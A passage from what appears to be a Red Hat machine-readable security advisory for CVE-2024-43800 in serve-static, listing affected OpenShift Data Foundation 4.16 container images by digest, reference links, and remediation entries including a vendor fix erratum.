"9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", 